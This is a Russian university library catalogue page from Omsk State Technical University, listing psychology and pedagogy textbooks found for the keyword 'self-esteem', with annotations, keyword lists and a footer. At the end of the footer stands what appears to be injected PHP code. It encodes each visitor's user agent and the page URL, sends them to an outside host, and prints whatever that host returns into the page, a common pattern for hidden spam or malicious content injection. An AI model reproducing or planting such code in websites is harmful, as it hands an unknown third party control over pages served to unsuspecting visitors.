Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

136 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=Самооценка")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 207
1. 
Общая психология [Текст] : Учеб. для вузов по направлению и специальностям психологии / А. В. Карпов, Н. П. Ансимова, Е. В. Карпова и др.; Под ред. А. В. Карпова, 2004. - 231 с.
Держатели документа (Информация об экземплярах) 

В учебнике изложены основные разделы учебного курса общей психологии, представлены традиционные и современные подходы к решению теоретических проблем данной области психологии.

Предназначается для студентов-психологов, аспирантов и преподавателей вузов.

2. 
Специальная психология [Текст] : Учеб. пособие для дефектол. фак. пед. вузов / В. И. Лубовский, Т. В. Розанова, Л. И. Солнцева и др.; Под ред. В. И. Лубовского, 2003. - 460, [1] с.

В учебном пособии представлены основные теоретические положения специальной психологии, общие закономерности нарушенного психического развития и охарактеризованно психическое развитие при разных типах дизонтогенеза. Многие фактические данные публикуются впервые. В заключительноц главе книги представлены направления практического применения специальных психологических знаний и другие вопросы, относящиеся ко всем типам нарушенного развития.

Полезно школьным психологам и учителям, а также педагогам дошкольных учреждений.

3. 
Колесникова, Наталия Ивановна. От конспекта к диссертации [Текст] : Учеб. пособие по развитию навыков письмен. речи / Н. И.Колесникова, 2003. - 287, [1] с.
Держатели документа (Информация об экземплярах) 

Учебное пособие развивает умение создавать собственные и вторичные научные тексты (тезисы, конспект, реферат, аннотация, курсовая и дипломная работы, диссертация). Автор предлагает систему знаний, направленных на практическое овладение этими жанрами научной речи.

Для студентов, аспирантов, преподавателей.

4. 
Колесникова, Наталия Ивановна. От конспекта к диссертации [Текст] : Учеб. пособие по развитию навыков письм. речи / Н. И. Колесникова, 2002. - 287, [1] с.

Учебное пособие развивает умение создавать собственные и вторичные научные тексты (тезисы, конспект, аннотация, реферат, курсовая и дипломная работы, диссертация). Автор предлагает систему заданий, направленных на практическое овладение этими жанрами научной речи.

Для студентов, аспирантов и преподавателей.

5. 
Мириманова, Мария Сергеевна. Конфликтология [Текст] : Учеб. пособие для учреждений сред. проф. образования по специальности 0322 - Организация воспитательной деятельности / М. С. Мириманова, 2003. - 318, [1] с.
Держатели документа (Информация об экземплярах) 

Учебник подготовлен в рамках программы "Формирование установок толерантного сознания и профилактика экстремизма в российском обществе". Это первый учебник, где предпринята попытка показать существующие подходы к рассмотрению конфликта, систематизировать современные научные данные в соответствии с идеей воспитания и развития толерантности. В нем рассматриваются проблемы конфликтологии и психологии конфликта. Важная роль отводится проблеме личности, общения, эмоционального реагирования, а также методам самопознания и саморазвития.

Рекомендуется учащимся колледжей, студентам, школьным психологам и педагогам, а также социальным работникам.

6. 
Педагогика [Текст] : Учеб. пособие для пед. учеб. заведений / В. В. Воронов, В. И. Журавлев, В. В. Краевский и др; Под ред. П. И. Пидкасистого, 2002. - 638 с.
Ключевые слова 
УЧЕБНИК И ПОСОБИЕ * -- ПЕДАГОГИЧЕСКОЕ ИССЛЕДОВАНИЕ -- ВОСПИТАНИЕ -- РАЗВИТИЕ ЛИЧНОСТИ -- СОЦИАЛИЗАЦИЯ ЛИЧНОСТИ -- ЛИЧНОСТЬ -- ДИДАКТИКА -- ОБУЧЕНИЕ -- ОБРАЗОВАНИЕ -- ШКОЛЬНОЕ образование -- ШКОЛА -- ШКОЛОВЕДЕНИЕ -- УЧЕБНЫЙ ПРОЦЕСС -- УРОК -- ВОСПИТАТЕЛЬНЫЙ ПРОЦЕСС -- СЕМЕЙНОЕ ВОСПИТАНИЕ -- УПРАВЛЕНИЕ ШКОЛОЙ -- ПЕДАГОГИЧЕСКИЙ КОЛЛЕКТИВ -- УЧИТЕЛЬ -- АТТЕСТАЦИЯ -- ДИРЕКТОР -- анализ урока -- самооценка урока -- проверка результатов обучения -- оценка результатов обучения -- оценка знаний учащихся -- неуспеваемость учащихся -- самовоспитание -- перевоспитание -- воспитание учащихся -- теория воспитания -- закономерности воспитания -- принципы воспитания -- воспитательный процесс -- содержание воспитательного процесса -- социальное пространство -- психологический климат группы -- методы воспитания -- средства воспитательного процесса -- формы воспитательного процесса -- семейное воспитание -- педагогические лектории -- родительские собрания -- нормативные документы о школе -- закон об образовании -- школоведение -- педагогический коллектив -- планирование работы в школе -- руководитель школы -- труд учителя -- методическая работа в школе -- аттестация педагогического персонала -- директор школы -- самообразование учителя -- аттестация учителей -- передовой педагогический опыт -- система внутришкольного контроля -- финансовые поступления в школу -- бюджет школы -- наглядные пособия -- оборудование кабинетов -- хозяйственное обеспечение школы -- оформление школы -- оформление учительской -- школьная документация -- внутришкольная оперативная информация
7. 
Вердербер, Рудольф. Психология общения [Текст] / Р. Вердербер, К. Вердербер; Пер. с англ.: И. Андреевой и др., 2003. - 318 с.
Ключевые слова 
УЧЕБНИК И ПОСОБИЕ -- КОММУНИКАЦИЯ -- ГРУППОВАЯ -- КОМПЕТЕНЦИЯ -- ВОСПРИЯТИЕ -- СОСТОЯНИЕ -- САМООЦЕНКА -- ЭМОЦИОНАЛЬНОЕ -- СОЦИАЛЬНОЕ -- ВЕРБАЛЬНАЯ -- ЯЗЫК -- ЖАРГОН -- СЛЕНГ -- НЕВЕРБАЛЬНАЯ -- ПАРАЯЗЫК -- САМОПРЕЗЕНТАЦИЯ -- БЕСЕДА -- ЭЛЕКТРОННАЯ -- ЭФФЕКТИВНОЕ -- ОБЩЕНИЕ -- ЭФФЕКТИВНЫЙ -- РАЗГОВОР -- ЗАПОМИНАНИЕ -- САМОРАСКРЫТИЕ -- ОБРАТНАЯ СВЯЗЬ -- АССЕРТИВНОСТЬ -- ВЗАИМООТНОШЕНИЕ -- ЭЛЕКТРОННОЕ ЗНАКОМСТВО -- ПЕРЕПИСКА -- КОНФЛИКТ -- ИНТЕРВЬЮИРОВАНИЕ -- СОБЕСЕДОВАНИЕ -- РЕЗЮМЕ -- СОПРОВОДИТЕЛЬНОЕ -- ПИСЬМО -- ЛИДЕРСТВО -- СОБРАНИЕ -- ПУБЛИЧНОЕ -- ВЕРБАЛЬНАЯ -- ВИЗУАЛЬНАЯ -- АДАПТАЦИЯ -- РЕЧЬ -- ИНФОРМАТИВНОЕ -- ВЫСТУПЛЕНИЕ
Держатели документа (Информация об экземплярах) 

Книга Рудольфа и Кэтлин Вердербер - идеально сбалансированное теоретико-практическое пособие по психологии общения, которое выдержало на Западе десять изданий! Это лучшее на сегодняшний день введение в основы процессов <человеческой> <коммуникации>. Оно включает в себя базовые сведения по <социальной> <психологии>, по психологии <межличностного> <общения> и <малых групп>, влияния <речевых> <коммуникаций> на социальные процессы. Знания, умения и навыки, которые вы получите и освоите с помощью данной книги, помогут вам быть компетентным, успешным и эффективным коммуникатором в любой области общественной практики.

8. 
Фетискин Н. П. Социально-психологическая диагностика развития личности и малых групп [Текст] : Учеб. пособие для вузов / Н. П. Фетискин, В. В. Козлов, Г. М. Мануйлов, 2002. - 488, [1] с.
Ключевые слова 
УЧЕБНИК И ПОСОБИЕ * -- РАЗВИТИЕ -- МАЛАЯ -- ГРУППА -- ПСИХОДИАГНОСТИКА -- ЭКСПРЕСС-ДИАГНОСТИКА -- ВЕРБАЛЬНАЯ -- ДИАГНОСТИКА -- САМООЦЕНКА -- КРЕАТИВНОСТЬ -- ТВОРЧЕСКИЙ -- ПОТЕНЦИАЛ -- МОТИВАЦИЯ -- УЧЕБНАЯ -- ПРОФЕССИОНАЛЬНАЯ -- СОЦИАЛЬНАЯ -- ПЕДАГОГИЧЕСКАЯ -- ДЕЯТЕЛЬНОСТЬ -- ПСИХОЛОГИЧЕСКАЯ -- ПОЗНАВАТЕЛЬНАЯ -- АКТИВНОСТЬ -- ЛИЧНОСТЬ -- ПЕДАГОГ -- КОММУНИКАТИВНАЯ -- ЭМПАТИЯ -- ПСИХИЧЕСКАЯ -- УСТОЙЧИВОСТЬ -- СПЛОЧЕННОСТЬ -- ПСИХОЛОГИЧЕСКИЙ -- КЛИМАТ -- АДАПТАЦИЯ -- СТУДЕНЧЕСКАЯ -- ПЕРСОНАЛ -- СТИЛЬ -- ОРГАНИЗАТОРСКАЯ -- СПОСОБНОСТЬ -- ПЕДАГОГИЧЕСКОЕ -- ОБЩЕНИЕ -- РУКОВОДСТВО -- ЛИДЕРСТВО -- ПСИХОЛОГИЯ -- АГРЕССИВНОЕ -- ПОВЕДЕНИЕ -- ВРАЖДЕБНОСТЬ -- ДЕПРЕССИЯ -- ТРЕВОЖНОСТЬ -- "ВЫГОРАНИЕ" -- САМОРЕАЛИЗАЦИЯ -- НЕВРОТИЧЕСКАЯ -- САМОРАЗВИТИЕ -- КОНФЛИКТ -- КОПИНГ-ПОВЕДЕНИЕ -- СТРЕССОВАЯ -- СИТУАЦИЯ -- КОМПЕТЕНТНОСТЬ -- ПРИВЛЕКАТЕЛЬНОСТЬ -- ТРУД -- ТЕСТИРОВАНИЕ
Держатели документа (Информация об экземплярах) 

Учебное пособие является наиболее комплексным и систематичным изложением социально-психологических методов диагностики развития личности и малых групп. Особое отличие инструментов исследования - их апробированность в российской психологической науке и надежность в использовании.

Учебное пособие предназначено для аспирантов и студентов вузов, а также психологов, социологов, педагогов и всех, кого интересуют проблемы личности и малых групп.

9. 
Общая психология [Текст] : Учеб. для вузов по специальностям психологии / Н. П. Ансимова, А. В. Карпов, Е. В. Карпова и др.; Под ред. А. В. Карпова, 2002. - 231 с.
Держатели документа (Информация об экземплярах) 

В учебнике изложены основные разделы учебного курса общей психологии, представлены традиционные и современные подходы к решению теоретических проблем данной области психологии.

Предназначается для студентов-психологов, аспирантов и преподавателей высших учебных заведений.

10. 
Чалдини, Роберт. Социальная психология. Пойми себя, чтобы понять других! [Текст] / Р. Чалдини, Д. Кенрик, С. Нейберг; Пер.: Н. Миронов и др.; Науч. ред. А. Л. Свенцицкий, 2002. - 333 с.
Ключевые слова 
Учебник и пособие -- Поведение -- Социальное поведение -- Личность -- Человек -- Ситуация -- Я -- Эмоция -- Познание -- Настроение -- Познание -- Социальное познание -- Понимание -- Точность -- Представление -- Самопрезентация -- Статус -- Власть -- Убеждение -- Последовательность -- Одобрение -- Социальное одобрение -- Влияние -- Социальное влияние -- Конформность -- Уступчивость -- Подчинение -- Дружба -- Любовь -- Семья -- Брак -- Статус -- Социальный статус -- Самооценка
Держатели документа (Информация об экземплярах) 
11. 
Гремлинг, Сандра Е. Практикум по управлению стрессом [Текст] / С. Е. Гремлинг, С. М. Ауэрбах; Пер. с англ. А. Смирнова, 2002. - 235 с.
Держатели документа (Информация об экземплярах) 
12. 
Столяренко, Людмила Дмитриевна. Основы психологии [Текст] : Учеб. пособие для вузов / Л. Д. Столяренко, 2001. - 671 с.
Ключевые слова 
Психология -- Учебник и пособие * -- Познавательный процесс -- Сознание -- Психика -- Личность -- Типология личности -- Педагогика -- Педагогическая психология -- Возрастная психология -- ВОСПРИЯТИЕ -- ВНИМАНИЕ -- ПАМЯТЬ -- МЫШЛЕНИЕ -- ИНТЕЛЛЕКТ - ПСИХОЛОГИЯ -- ВООБРАЖЕНИЕ -- РЕЧЬ - ПСИХОЛОГИЯ -- СОЗНАНИЕ - ПСИХОЛОГИЯ -- СОН -- КРЕАТИВНОСТЬ - психология -- МЫШЛЕНИЕ -- САМОСОЗНАНИЕ -- ВОЛЯ -- ЭМОЦИИ -- ЛИЧНОСТЬ - ПСИХОЛОГИЯ -- СОЦИАЛИЗАЦИЯ ЛИЧНОСТИ -- СТАТУС СОЦИАЛЬНЫЙ -- ТИПОЛОГИЯ личности -- ТЕМПЕРАМЕНТ -- ХАРАКТЕР -- САМООЦЕНКА -- НЕВРОЗ -- ПСИХОСОЦИОТИП -- ТИПОЛОГИЯ СЕНСОРНАЯ -- ФРУСТРАЦИЯ -- ПОТРЕБНОСТЬ - ПСИХОЛОГИЯ -- МОТИВАЦИЯ - ПСИХОЛОГИЯ -- ТЕОРИЯ ЛИЧНОСТИ - Психология -- БИХЕВИОРИЗМ -- Сценарий жизненный -- ПСИХОЛОГИЯ ОБЩЕНИЯ -- ОБЩЕНИЕ - ПСИХОЛОГИЯ -- ГРУППА - ПСИХОЛОГИЯ -- КОЛЛЕКТИВ - ПСИХОЛОГИЯ -- СОЦИОМЕТРИЯ -- КОНФЛИКТ ЭТНИЧЕСКИЙ -- ЛИДЕРСТВО - ПСИХОЛОГИЯ -- СТИЛЬ УПРАВЛЕНИЯ -- ЭФФЕКТИВНОСТЬ УПРАВЛЕНИЯ -- МЕНЕДЖЕР - ПСИХОЛОГИЯ -- ПСИХОЛОГИЯ ПЕДАГОГИЧЕСКАЯ -- ДЕЯТЕЛЬНОСТЬ УЧЕБНАЯ -- ОБУЧЕНИЕ ПРОБЛЕМНОЕ -- Обучение программированное -- ИГРА ДЕЛОВАЯ учебная -- ОБУЧЕНИЕ ПРОИЗВОДСТВЕННОЕ -- ОБУЧЕНИЕ ПРОФЕССИОНАЛЬНОЕ -- ПРОЕКТИРОВАНИЕ ПЕДАГОГИЧЕСКО -- ОБЩЕНИЕ ПЕДАГОГИЧЕСКОЕ
13. 
Бахтин, Михаил Михайлович. Автор и герой [Текст] : К филос. основам гуманитар. наук / М. М. Бахтин; С. Г. Бочаров, 2000. - 333 с.
Держатели документа (Информация об экземплярах) 
14. 
Методы квалиметрии в машиностроении [Текст] : Учеб. пособие / А. И. Владимиров, В. Я. Кершенбаум, М. П. Поликарпов и др., 1999. - 211 с.
Держатели документа (Информация об экземплярах) 
15. 
Физическая культура [Текст] : курс лекций / Ж. Б. Сафонова [и др.]. ; под ред. Ж. Б. Сафоновой, 2001. - 155 с.
Оглавление 
Держатели документа (Информация об экземплярах) 
Полный текст
16. 
Либина, Алена. Психология современной женщины: И умная, и красивая, и счастливая.. [Текст] : И умная, и красивая, и счастливая.. / А.Либина, 2001. - 528 с.
17. 
Физическая культура [Текст] : Курс лекций / Ж. Б. Сафонова, В. М. Шулятьев, В. Ф. Красавина и др.; под ред. Ж. Б. Сафоновой, 2002. - 154 с.
Оглавление 
Держатели документа (Информация об экземплярах) 
Полный текст
18. 
Психология и этика делового общения [Текст] : Учеб. для вузов / В. Ю. Дорошенко, Л. И. Зотова, В. Н. Лавриненко и др.; Под ред. В. Н. Лавриненко, 2002. - 415 с.
19. 
Самосознание и защитные механизмы личности [Текст] : Хрестоматия по социальной психологии личности / Ред.-сост. Д. Я. Райгородский, 2000. - 655 с.
Оглавление 
  • Бассин, Ф. В. О силе "Я" и психологической защите / Ф. В. Бассин. - с.3
  • Кон, Игорь Семенович. Категория "Я" в психологии / И. С. Кон. - с.15
  • Лапланш, Ж. Проблема "Я" в психоанализе / ; Ж. Лаплпнш, Ж. Понталис. - с.34
  • Лэнг, Р. Самосознание / Р. Лэнг. - с.51
  • Столин, В. В. Состояние самосознания личности / В. В. Столин. - с.66
  • Лэнг, Р. Воплощенное и невоплощенное "Я" / Р. Лэнг. - с.84
  • Шибутани, Тамотсу. Деперсонализация / Т. Шибутани. - с.101
  • Соколова, Елена Теодоровна. Соотношение физического Я-образа и самооценки / Е. Т. Соколова. - с.109
  • Бернс, Р. Я-концепция и Я-образы / Р. Бернс. - с.133
  • Шибутани, Тамотсу. Я-концепция и чувство собственного достоинства / Т. Шибутани. - с.220
  • Михеева, И. Н. Я-концепция и конфликт в сфере нравственной жизни личности / И. Н. Михеева. - с.232
  • Миюскович, Бен. Я-концепция и психология одиночества / Б. Миюскович. - с.252
  • Пепло, Л. Одиночество и самооценка / Л. Пепло, М. Мицели, Б. Морали. - с.261
  • Зимбардо, Филипп. Формирование самооценки / Ф. Зимбардо. - с.282
  • Лэнг, Р. Переживание / Р. Лэнг. - с.299
  • Василюк, Ф. Е. Процесс переживания / Ф. Е. Василюк. - с.309
  • Фрейд, Анна. Защитные механизмы / А. Фрейд. - с.339
  • Лапланш, Ж. Защита / Ж. Лапланш, Ж. Понталис. - с.357
  • Налчаджян, Альберт Агабекович. Психологические защитные механизмы / А. А. Налчаджян. - с.395
  • Тарт, Г. Механизмы защиты / Г. Тарт. - с.482
  • Менинжер, В. Психические механизмы / В. Менинжер, М. Лиф. - с.509
  • Фромм, Эрих. Защитные механизмы / Э. Фромм. - с.537
  • Романова, Евгения Сергеевна. Механизмы защиты как специфические средства решения универсальных проблем адаптации / Е. С. Романова, Л. Р. Гребенников. - с.566
  • Блюм, Геральд. Генезис защитных механизмов / Г. Блюм. - с.594
  • Савенко, Ю. С. Проблема психологических компенсаторных механизмов и их типология / Ю. С. Савенко. - с.622
  • Гоффман, Э. Представление себя другим / Э. Гоффман. - с.640
20. 
Зиверт, Хорст. Тестирование личности [Текст] / Х. Зиверт; В. А. Лаврентьев, 1998. - 196 с.


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3054 - 20.10.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.38 с.12 запросов, 0.67c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;